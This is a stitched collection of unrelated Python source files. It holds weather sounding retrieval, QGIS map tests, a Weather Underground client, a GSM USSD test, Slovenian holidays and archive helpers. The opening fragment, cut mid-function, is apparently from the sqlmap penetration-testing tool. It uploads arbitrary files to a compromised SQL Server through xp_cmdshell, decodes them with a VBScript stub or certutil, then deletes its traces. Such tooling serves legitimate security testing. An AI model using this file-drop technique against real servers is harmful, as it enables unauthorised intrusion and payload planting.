strOut = strOut + Chr(((w2 * 16 + Int(w3 / 4)) And 255))
If Not w4 Then _
strOut = strOut + Chr(((w3 * 64 + w4) And 255))
Next
base64_decode = strOut
End Function
Function mimedecode(byVal strIn)
Base64Chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
If Len(strIn) = 0 Then
mimedecode = -1 : Exit Function
Else
mimedecode = InStr(Base64Chars, strIn) - 1
End If
End Function""" % (randFilePath, dFile)
vbs = vbs.replace(" ", "")
encodedFileContent = base64encode(wFileContent)
logger.debug("uploading the file base64-encoded content to %s, please wait.." % randFilePath)
self.xpCmdshellWriteFile(encodedFileContent, tmpPath, randFile)
logger.debug("uploading a visual basic decoder stub %s\%s, please wait.." % (tmpPath, randVbs))
self.xpCmdshellWriteFile(vbs, tmpPath, randVbs)
commands = ("cd \"%s\"" % tmpPath, "cscript //nologo %s" % randVbs,
"del /F /Q %s" % randVbs,
"del /F /Q %s" % randFile)
complComm = " & ".join(command for command in commands)
self.execCmd(complComm)
def _stackedWriteFileCertutilExe(self, tmpPath, wFile, wFileContent, dFile, fileType):
infoMsg = "using certutil.exe to write the %s " % fileType
infoMsg += "file content to file '%s', please wait.." % dFile
logger.info(infoMsg)
chunkMaxSize = 500
randFile = "tmpf%s.txt" % randomStr(lowercase=True)
randFilePath = "%s\%s" % (tmpPath, randFile)
encodedFileContent = base64encode(wFileContent)
splittedEncodedFileContent = '\n'.join([encodedFileContent[i:i+chunkMaxSize] for i in xrange(0, len(encodedFileContent), chunkMaxSize)])
logger.debug("uploading the file base64-encoded content to %s, please wait.." % randFilePath)
self.xpCmdshellWriteFile(splittedEncodedFileContent, tmpPath, randFile)
logger.debug("decoding the file to %s.." % dFile)
commands = ("cd \"%s\"" % tmpPath, "certutil -f -decode %s %s" % (randFile, dFile),
"del /F /Q %s" % randFile)
complComm = " & ".join(command for command in commands)
self.execCmd(complComm)
def stackedWriteFile(self, wFile, dFile, fileType, forceCheck=False):
# NOTE: this is needed here because we use xp_cmdshell extended
# procedure to write a file on the back-end Microsoft SQL Server
# file system
self.initEnv()
self.getRemoteTempPath()
tmpPath = posixToNtSlashes(conf.tmpPath)
dFile = posixToNtSlashes(dFile)
with open(wFile, "rb") as f:
wFileContent = f.read()
self._stackedWriteFilePS(tmpPath, wFileContent, dFile, fileType)
written = self.askCheckWrittenFile(wFile, dFile, forceCheck)
if written is False:
message = "do you want to try to upload the file with "
message += "the custom Visual Basic script technique? [Y/n] "
if readInput(message, default='Y', boolean=True):
self._stackedWriteFileVbs(tmpPath, wFileContent, dFile, fileType)
written = self.askCheckWrittenFile(wFile, dFile, forceCheck)
if written is False:
message = "do you want to try to upload the file with "
message += "the built-in debug.exe technique? [Y/n] "
if readInput(message, default='Y', boolean=True):
self._stackedWriteFileDebugExe(tmpPath, wFile, wFileContent, dFile, fileType)
written = self.askCheckWrittenFile(wFile, dFile, forceCheck)
if written is False:
message = "do you want to try to upload the file with "
message += "the built-in certutil.exe technique? [Y/n] "
if readInput(message, default='Y', boolean=True):
self._stackedWriteFileCertutilExe(tmpPath, wFile, wFileContent, dFile, fileType)
written = self.askCheckWrittenFile(wFile, dFile, forceCheck)
return written
|
# #
# #
#
# Classes for retrieving soundings based on gridded data from the Data Access
# Framework
#
#
#
# SOFTWARE HISTORY
#
# Date Ticket# Engineer Description
# ------------ ---------- ----------- --------------------------
# 06/24/15 #4480 dgilling Initial Creation.
#
from collections import defaultdict
from shapely.geometry import Point
from awips import DateTimeConverter
from awips.dataaccess import DataAccessLayer
from dynamicserialize.dstypes.com.raytheon.uf.common.time import DataTime
from dynamicserialize.dstypes.com.raytheon.uf.common.dataplugin.level import Level
def getSounding(modelName, weatherElements, levels, samplePoint, refTime=None, timeRange=None):
""""
Performs a series of Data Access Framework requests to retrieve a sounding object
based on the specified request parameters.
Args:
modelName: the grid model datasetid to use as the basis of the sounding.
weatherElements: a list of parameters to return in the sounding.
levels: a list of levels to sample the given weather elements at
samplePoint: a lat/lon pair to perform the sampling of data at.
refTime: (optional) the grid model reference time to use for the sounding.
If not specified, the latest ref time in the system will be used.
timeRange: (optional) a TimeRange to specify which forecast hours to use.
If not specified, will default to all forecast hours.
Returns:
A _SoundingCube instance, which acts a 3-tiered dictionary, keyed
by DataTime, then by level and finally by weather element. If no
data is available for the given request parameters, None is returned.
"""
(locationNames, parameters, levels, envelope, refTime, timeRange) = \
__sanitizeInputs(modelName, weatherElements, levels, samplePoint, refTime, timeRange)
requestArgs = { 'datatype' : 'grid',
'locationNames' : locationNames,
'parameters' : parameters,
'levels' : levels,
'envelope' : envelope,
}
req = DataAccessLayer.newDataRequest(**requestArgs)
forecastHours = __determineForecastHours(req, refTime, timeRange)
if not forecastHours:
return None
response = DataAccessLayer.getGeometryData(req, forecastHours)
soundingObject = _SoundingCube(response)
return soundingObject
def setEDEXHost(host):
"""
Changes the EDEX host the Data Access Framework is communicating with.
Args:
host: the EDEX host to connect to
"""
if host:
DataAccessLayer.changeEDEXHost(str(host))
def __sanitizeInputs(modelName, weatherElements, levels, samplePoint, refTime, timeRange):
locationNames = [str(modelName)]
parameters = __buildStringList(weatherElements)
levels = __buildStringList(levels)
envelope = Point(samplePoint)
if refTime is not None:
refTime = DataTime(refTime=DateTimeConverter.convertToDateTime(refTime))
if timeRange is not None:
timeRange = DateTimeConverter.constructTimeRange(*timeRange)
return (locationNames, parameters, levels, envelope, refTime, timeRange)
def __determineForecastHours(request, refTime, timeRange):
dataTimes = DataAccessLayer.getAvailableTimes(request, False)
timesGen = [(DataTime(refTime=dataTime.getRefTime()), dataTime) for dataTime in dataTimes]
dataTimesMap = defaultdict(list)
for baseTime, dataTime in timesGen:
dataTimesMap[baseTime].append(dataTime)
if refTime is None:
refTime = max(dataTimesMap.keys())
forecastHours = dataTimesMap[refTime]
if timeRange is None:
return forecastHours
else:
return [forecastHour for forecastHour in forecastHours if timeRange.contains(forecastHour.getValidPeriod())]
def __buildStringList(param):
if __notStringIter(param):
return [str(item) for item in param]
else:
return [str(param)]
def __notStringIter(iterable):
if not isinstance(iterable, str):
try:
iter(iterable)
return True
except TypeError:
return False
class _SoundingCube(object):
"""
The top-level sounding object returned when calling SoundingsSupport.getSounding.
This object acts as a 3-tiered dict which is keyed by time then level
then parameter name. Calling times() will return all valid keys into this
object.
"""
def __init__(self, geometryDataObjects):
self._dataDict = {}
self._sortedTimes = []
if geometryDataObjects:
for geometryData in geometryDataObjects:
dataTime = geometryData.getDataTime()
level = geometryData.getLevel()
for parameter in geometryData.getParameters():
self.__addItem(parameter, dataTime, level, geometryData.getNumber(parameter))
def __addItem(self, parameter, dataTime, level, value):
timeLayer = self._dataDict.get(dataTime, _SoundingTimeLayer(dataTime))
self._dataDict[dataTime] = timeLayer
timeLayer._addItem(parameter, level, value)
if dataTime not in self._sortedTimes:
self._sortedTimes.append(dataTime)
self._sortedTimes.sort()
def __getitem__(self, key):
return self._dataDict[key]
def __len__(self):
return len(self._dataDict)
def times(self):
"""
Returns the valid times for this sounding.
Returns:
A list containing the valid DataTimes for this sounding in order.
"""
return self._sortedTimes
class _SoundingTimeLayer(object):
"""
The second-level sounding object returned when calling SoundingsSupport.getSounding.
This object acts as a 2-tiered dict which is keyed by level then parameter
name. Calling levels() will return all valid keys into this
object. Calling time() will return the DataTime for this particular layer.
"""
def __init__(self, dataTime):
self._dataTime = dataTime
self._dataDict = {}
def _addItem(self, parameter, level, value):
asString = str(level)
levelLayer = self._dataDict.get(asString, _SoundingTimeAndLevelLayer(self._dataTime, asString))
levelLayer._addItem(parameter, value)
self._dataDict[asString] = levelLayer
def __getitem__(self, key):
asString = str(key)
if asString in self._dataDict:
return self._dataDict[asString]
else:
raise KeyError("Level " + str(key) + " is not a valid level for this sounding.")
def __len__(self):
return len(self._dataDict)
def time(self):
"""
Returns the DataTime for this sounding cube layer.
Returns:
The DataTime for this sounding layer.
"""
return self._dataTime
def levels(self):
"""
Returns the valid levels for this sounding.
Returns:
A list containing the valid levels for this sounding in order of
closest to surface to highest from surface.
"""
sortedLevels = [Level(level) for level in list(self._dataDict.keys())]
sortedLevels.sort()
return [str(level) for level in sortedLevels]
class _SoundingTimeAndLevelLayer(object):
"""
The bottom-level sounding object returned when calling SoundingsSupport.getSounding.
This object acts as a dict which is keyed by parameter name. Calling
parameters() will return all valid keys into this object. Calling time()
will return the DataTime for this particular layer. Calling level() will
return the level for this layer.
"""
def __init__(self, time, level):
self._time = time
self._level = level
self._parameters = {}
def _addItem(self, parameter, value):
self._parameters[parameter] = value
def __getitem__(self, key):
return self._parameters[key]
def __len__(self):
return len(self._parameters)
def level(self):
"""
Returns the level for this sounding cube layer.
Returns:
The level for this sounding layer.
"""
return self._level
def parameters(self):
"""
Returns the valid parameters for this sounding.
Returns:
A list containing the valid parameter names.
"""
return list(self._parameters.keys())
def time(self):
"""
Returns the DataTime for this sounding cube layer.
Returns:
The DataTime for this sounding layer.
"""
return self._time
|
# -*- coding: utf-8 -*-
"""QGIS Unit tests for QgsComposerMap.
.. note:: This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
"""
__author__ = '(C) 2012 by Dr. Horst Düster / Dr. Marco Hugentobler'
__date__ = '20/08/2012'
__copyright__ = 'Copyright 2012, The QGIS Project'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
import qgis
import os
from PyQt4.QtCore import QFileInfo
from PyQt4.QtXml import QDomDocument
from PyQt4.QtGui import QPainter
from qgis.core import (QgsComposerMap,
QgsRectangle,
QgsRasterLayer,
QgsComposition,
QgsMapRenderer,
QgsMapLayerRegistry,
QgsMultiBandColorRenderer,
)
from utilities import (unitTestDataPath,
getQgisTestApp,
TestCase,
unittest,
expectedFailure
)
from qgscompositionchecker import QgsCompositionChecker
QGISAPP, CANVAS, IFACE, PARENT = getQgisTestApp()
TEST_DATA_DIR = unitTestDataPath()
class TestQgsComposerMap(TestCase):
def __init__(self, methodName):
"""Run once on class initialisation."""
unittest.TestCase.__init__(self, methodName)
myPath = os.path.join(TEST_DATA_DIR, 'rgb256x256.png')
rasterFileInfo = QFileInfo(myPath)
mRasterLayer = QgsRasterLayer(rasterFileInfo.filePath(),
rasterFileInfo.completeBaseName())
rasterRenderer = QgsMultiBandColorRenderer(
mRasterLayer.dataProvider(), 1, 2, 3)
mRasterLayer.setRenderer(rasterRenderer)
#pipe = mRasterLayer.pipe()
#assert pipe.set(rasterRenderer), 'Cannot set pipe renderer'
QgsMapLayerRegistry.instance().addMapLayers([mRasterLayer])
# create composition with composer map
self.mMapRenderer = QgsMapRenderer()
layerStringList = []
layerStringList.append(mRasterLayer.id())
self.mMapRenderer.setLayerSet(layerStringList)
self.mMapRenderer.setProjectionsEnabled(False)
self.mComposition = QgsComposition(self.mMapRenderer)
self.mComposition.setPaperSize(297, 210)
self.mComposerMap = QgsComposerMap(self.mComposition, 20, 20, 200, 100)
self.mComposerMap.setFrameEnabled(True)
self.mComposition.addComposerMap(self.mComposerMap)
def testOverviewMap(self):
overviewMap = QgsComposerMap(self.mComposition, 20, 130, 70, 70)
overviewMap.setFrameEnabled(True)
self.mComposition.addComposerMap(overviewMap)
# zoom in
myRectangle = QgsRectangle(96, -152, 160, -120)
self.mComposerMap.setNewExtent(myRectangle)
myRectangle2 = QgsRectangle(0, -256, 256, 0)
overviewMap.setNewExtent(myRectangle2)
overviewMap.setOverviewFrameMap(self.mComposerMap.id())
checker = QgsCompositionChecker('composermap_overview', self.mComposition)
checker.setControlPathPrefix("composer_mapoverview")
myTestResult, myMessage = checker.testComposition()
self.mComposition.removeComposerItem(overviewMap)
assert myTestResult, myMessage
def testOverviewMapBlend(self):
overviewMap = QgsComposerMap(self.mComposition, 20, 130, 70, 70)
overviewMap.setFrameEnabled(True)
self.mComposition.addComposerMap(overviewMap)
# zoom in
myRectangle = QgsRectangle(96, -152, 160, -120)
self.mComposerMap.setNewExtent(myRectangle)
myRectangle2 = QgsRectangle(0, -256, 256, 0)
overviewMap.setNewExtent(myRectangle2)
overviewMap.setOverviewFrameMap(self.mComposerMap.id())
overviewMap.setOverviewBlendMode(QPainter.CompositionMode_Multiply)
checker = QgsCompositionChecker('composermap_overview_blending', self.mComposition)
checker.setControlPathPrefix("composer_mapoverview")
myTestResult, myMessage = checker.testComposition()
self.mComposition.removeComposerItem(overviewMap)
assert myTestResult, myMessage
def testOverviewMapInvert(self):
overviewMap = QgsComposerMap(self.mComposition, 20, 130, 70, 70)
overviewMap.setFrameEnabled(True)
self.mComposition.addComposerMap(overviewMap)
# zoom in
myRectangle = QgsRectangle(96, -152, 160, -120)
self.mComposerMap.setNewExtent(myRectangle)
myRectangle2 = QgsRectangle(0, -256, 256, 0)
overviewMap.setNewExtent(myRectangle2)
overviewMap.setOverviewFrameMap(self.mComposerMap.id())
overviewMap.setOverviewInverted(True)
checker = QgsCompositionChecker('composermap_overview_invert', self.mComposition)
checker.setControlPathPrefix("composer_mapoverview")
myTestResult, myMessage = checker.testComposition()
self.mComposition.removeComposerItem(overviewMap)
assert myTestResult, myMessage
def testOverviewMapCenter(self):
overviewMap = QgsComposerMap(self.mComposition, 20, 130, 70, 70)
overviewMap.setFrameEnabled(True)
self.mComposition.addComposerMap(overviewMap)
# zoom in
myRectangle = QgsRectangle(192, -288, 320, -224)
self.mComposerMap.setNewExtent(myRectangle)
myRectangle2 = QgsRectangle(0, -256, 256, 0)
overviewMap.setNewExtent(myRectangle2)
overviewMap.setOverviewFrameMap(self.mComposerMap.id())
overviewMap.setOverviewInverted(False)
overviewMap.setOverviewCentered(True)
checker = QgsCompositionChecker('composermap_overview_center', self.mComposition)
checker.setControlPathPrefix("composer_mapoverview")
myTestResult, myMessage = checker.testComposition()
self.mComposition.removeComposerItem(overviewMap)
assert myTestResult, myMessage
# Fails because addItemsFromXML has been commented out in sip
@expectedFailure
def testuniqueId(self):
doc = QDomDocument()
documentElement = doc.createElement('ComposerItemClipboard')
self.mComposition.writeXML(documentElement, doc)
self.mComposition.addItemsFromXML(documentElement, doc, 0, False)
# test if both composer maps have different ids
newMap = QgsComposerMap()
mapList = self.mComposition.composerMapItems()
for mapIt in mapList:
if mapIt != self.mComposerMap:
newMap = mapIt
break
oldId = self.mComposerMap.id()
newId = newMap.id()
self.mComposition.removeComposerItem(newMap)
myMessage = 'old: %s new: %s' % (oldId, newId)
assert oldId != newId, myMessage
def testWorldFileGeneration(self):
myRectangle = QgsRectangle(781662.375, 3339523.125, 793062.375, 3345223.125)
self.mComposerMap.setNewExtent(myRectangle)
self.mComposerMap.setMapRotation(30.0)
self.mComposition.setGenerateWorldFile(True)
self.mComposition.setWorldFileMap(self.mComposerMap)
p = self.mComposition.computeWorldFileParameters()
pexpected = (4.180480199790922, 2.4133064516129026, 779443.7612381146,
2.4136013686911886, -4.179969388427311, 3342408.5663611)
ptolerance = (0.001, 0.001, 1, 0.001, 0.001, 1e+03)
for i in range(0, 6):
assert abs(p[i] - pexpected[i]) < ptolerance[i]
if __name__ == '__main__':
unittest.main()
|
#!/usr/bin/env python
import datetime
import requests
FORECAST_URL = 'http://www.wunderground.com/cgi-bin/findweather/' \
'getForecast'
API_TEMPLATE = 'http://api.wunderground.com/api/{}'
api = None
class WeatherException(Exception):
def __init__(self, message, error=None):
super(WeatherException, self).__init__(message)
self.error = error
def set_key(key):
global api
api = API_TEMPLATE.format(key)
def get_forecast_url(location, date=None):
url = '{}?query={}'.format(FORECAST_URL, location)
if date:
if isinstance(date, (str, unicode)):
date = datetime.datetime.strptime(date, '%Y-%m-%d').date()
url += '&hourly=1&yday={}&weekday={}'.format(
date.strftime('%j'), date.strftime('%A'))
return url
def forecast(location):
'''
Get the current conditions and a 4-day forecast for a location
The location may be 'latitude,longitude' (-39.452,18.234), a US ZIP code,
or a 'state/city' path like 'OH/Fairborn' or 'NY/New_York'.
'''
url = '{}/conditions/alerts/astronomy/forecast10day/q/{}.json'.format(
api, location)
r = requests.get(url).json()
if 'error' in r['response']:
raise WeatherException('Your key is invalid or wunderground is down',
r['response']['error'])
return r
def autocomplete(query):
'''Return autocomplete values for a query'''
url = 'http://autocomplete.wunderground.com/aq?query={}'.format(query)
return requests.get(url).json()['RESULTS']
if __name__ == '__main__':
from argparse import ArgumentParser
from pprint import pformat
parser = ArgumentParser()
parser.add_argument('function', choices=('forecast', 'autocomplete'))
parser.add_argument('location', help='ZIP code')
parser.add_argument('-k', '--key', help='API key')
args = parser.parse_args()
if args.key:
set_key(args.key)
func = globals()[args.function]
print pformat(func(args.location))
|
#!/usr/bin/python3
from test_shared import *
from lib.sim900.ussdhandler import SimUssdHandler
import re
from lib.sim900.simshared import *
COMPORT_NAME = "com22"
#logging levels
CONSOLE_LOGGER_LEVEL = logging.INFO
LOGGER_LEVEL = logging.INFO
def parseBalanceResult(value, prefix, suffix, mustBeFloat = True):
"""
Parses string which contains information about current account balance.
Information about current balance value must be stored between prefix and suffix.
:param value: text for scanning
:param prefix: text prefix for searching
:param suffix: suffix for searching
:param mustBeFloat: does balance must be float
:return: current balance value or None on error
"""
m = re.search("{0}(.+?){1}".format(prefix, suffix), value)
if not m:
return None
found = m.group(1)
if found is None:
found = ''
else:
found = str(found).strip()
if mustBeFloat:
return strToFloat(found)
if not str(found).isnumeric():
return None
return int(found)
def main():
"""
Tests USSD commands execution and results retrieving.
:return: true if everything was OK, otherwise returns false
"""
#adding & initializing port object
port = initializeUartPort(portName=COMPORT_NAME)
#initializing logger
(formatter, logger, consoleLogger,) = initializeLogs(LOGGER_LEVEL, CONSOLE_LOGGER_LEVEL)
#making base operations
d = baseOperations(port, logger)
if d is None:
return False
(gsm, imei) = d
ussd = SimUssdHandler(port, logger)
logger.info("running USSD code")
#calling USSD command for balance information retrieving ( 'life :)' cell operator from Ukraine )
if not ussd.runUssdCode("*111#"):
logger.error("error running USSD code")
return False
logger.info("USSD result = {0}".format(ussd.lastUssdResult))
logger.info("Reading current balance value...")
#Parsing balance for 'life :)' cell operator from Ukraine
balance = parseBalanceResult(ussd.lastUssdResult, "Balans ", "grn,")
if balance is not None:
logger.info("Current balance value: {0}".format(balance))
else:
logger.warn("balance retrieving error")
gsm.closePort()
return True
if __name__ == "__main__":
main()
print("DONE")
|
# -*- coding: utf-8 -*-
# python-holidays
# ---------------
# A fast, efficient Python library for generating country, province and state
# specific sets of holidays on the fly. It aims to make determining whether a
# specific date is a holiday as fast and flexible as possible.
#
# Author: ryanss <[email protected]> (c) 2014-2017
# dr-prodigy <[email protected]> (c) 2017-2020
# Website: https://github.com/dr-prodigy/python-holidays
# License: MIT (see LICENSE file)
from datetime import date
from dateutil.easter import easter
from dateutil.relativedelta import relativedelta as rd
from holidays.constants import JAN, FEB, APR, MAY, JUN, AUG, OCT, \
NOV, DEC
from holidays.holiday_base import HolidayBase
class Slovenia(HolidayBase):
"""
Contains all work-free public holidays in Slovenia.
No holidays are returned before year 1991 when Slovenia became independent
country. Before that Slovenia was part of Socialist federal republic of
Yugoslavia.
List of holidays (including those that are not work-free:
https://en.wikipedia.org/wiki/Public_holidays_in_Slovenia
"""
def __init__(self, **kwargs):
self.country = 'SI'
HolidayBase.__init__(self, **kwargs)
def _populate(self, year):
if year <= 1990:
return
if year > 1991:
self[date(year, JAN, 1)] = "novo leto"
# Between 2012 and 2017 2nd January was not public holiday,
# or at least not work-free day
if year < 2013 or year > 2016:
self[date(year, JAN, 2)] = "novo leto"
# Prešeren's day, slovenian cultural holiday
self[date(year, FEB, 8)] = "Prešernov dan"
# Easter monday is the only easter related work-free day
easter_day = easter(year)
self[easter_day + rd(days=1)] = "Velikonočni ponedeljek"
# Day of uprising against occupation
self[date(year, APR, 27)] = "dan upora proti okupatorju"
# Labour day, two days of it!
self[date(year, MAY, 1)] = "praznik dela"
self[date(year, MAY, 2)] = "praznik dela"
# Statehood day
self[date(year, JUN, 25)] = "dan državnosti"
# Assumption day
self[date(year, AUG, 15)] = "Marijino vnebovzetje"
# Reformation day
self[date(year, OCT, 31)] = "dan reformacije"
# Remembrance day
self[date(year, NOV, 1)] = "dan spomina na mrtve"
# Christmas
self[date(year, DEC, 25)] = "Božič"
# Day of independence and unity
self[date(year, DEC, 26)] = "dan samostojnosti in enotnosti"
class SI(Slovenia):
pass
class SVN(Slovenia):
pass
|
import mimetypes
import zipfile
import gzip
import tarfile
from cStringIO import StringIO
class _ZipMember(object):
def __init__(self, member, container):
self.name = member.filename
self.size = member.file_size
self.container = container
def extractor(self):
return self.container.open(self.name)
class _TarMember(object):
def __init__(self, member, container):
self.member = member
self.name = member.name
self.size = member.size
self.container = container
def extractor(self):
return self.container.extractfile(self.member)
def get_archive_members(file_object, content_type):
if content_type == 'application/zip':
zf = zipfile.ZipFile(file_object)
for member in zf.infolist():
yield _ZipMember(
member,
zf
)
elif content_type == 'application/x-gzip':
tar = gzip.GzipFile(fileobj=file_object)
zf = tarfile.TarFile(fileobj=tar)
for member in zf.getmembers():
if member.isfile():
yield _TarMember(
member,
zf
)
elif content_type == 'application/x-tar':
zf = tarfile.TarFile(fileobj=file_object)
for member in zf.getmembers():
# Sometimes when you make a tar file you get a
# smaller index file copy that start with "./._".
if member.isfile() and not member.name.startswith('./._'):
yield _TarMember(
member,
zf
)
else:
raise NotImplementedError(content_type)
def preview_archive_content(file_object, content_type):
"""return file listing of the contents of an archive file"""
out = StringIO()
for member in get_archive_members(file_object, content_type):
print >>out, member.name.ljust(70),
print >>out, str(member.size).rjust(9)
return out.getvalue()
def filename_to_mimetype(filename):
filename = filename.lower()
# .tgz and .tar.gz files in mimetypes.guess_type
# returns 'application/x-tar' :(
if filename.endswith('.tgz') or filename.endswith('.tar.gz'):
return 'application/x-gzip'
return mimetypes.guess_type(filename)[0]
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.